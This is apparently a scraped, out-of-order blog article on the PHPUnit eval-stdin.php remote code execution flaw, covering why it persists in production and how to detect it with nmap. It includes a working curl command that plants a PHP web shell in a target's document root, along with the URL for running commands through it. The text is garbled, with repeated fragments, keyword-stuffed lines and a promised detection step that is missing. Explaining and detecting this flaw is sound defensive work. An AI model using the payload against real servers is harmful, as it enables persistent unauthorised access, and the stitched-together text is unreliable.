Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Exploit -

Check your servers today. Run the find command. That ghost might be lurking in your dependencies, waiting for a POST request.

# Writing a web shell to the document root curl -X POST https://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -d "<?php file_put_contents('shell.php', '<?php system(\$_REQUEST[\"cmd\"]); ?>'); ?>" Now, the attacker can simply visit https://target.com/shell.php?cmd=whoami and maintain access indefinitely, even after the original eval-stdin.php is removed. It has been several years since the CVE was published. Yet, scans still reveal this vulnerability. Why? 1. The "Dev Dependencies in Prod" Anti-Pattern The root cause is deploying composer with the --dev flag or not using --no-dev in production. Many developers run composer install (which installs everything) on a live server. PHPUnit, being a require-dev dependency by default, ends up in the public web root. 2. Automated Scanners and Botnets Script kiddies and botnets don't check version numbers. They blindly spray payloads at this endpoint. Even if the PHPUnit version is patched, if the file exists, they will attempt the exploit. 3. Misconfigured Web Roots In many shared hosting or poorly configured nginx/Apache setups, the web root points to the project root (where vendor/ lives) instead of a /public subdirectory. This exposes every vendor file to the world. 4. Backup or Legacy Systems A developer copies a legacy project from five years ago. The lock file says phpunit/phpunit: 4.5.0 . They upload it, and the vulnerability is instantly live. Part 4: Detection – How to find this on your network If you are a Blue Teamer or a system administrator, you need to identify this flaw. Web Application Scanning Use nmap with its http-vuln-cve2017-9841 script: vendor phpunit phpunit src util php eval-stdin.php exploit

nmap -p443 --script http-vuln-cve2017-9841 target.com Or use curl manually: Check your servers today

While the vulnerability was patched in 2017, automated scanners still routinely flag this file. For every penetration tester, system administrator, or developer, encountering a URL like https://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php sends a jolt of adrenaline. # Writing a web shell to the document

Your vendor folder should never, ever be directly accessible by a web request. And your production server should never, ever see a --dev dependency.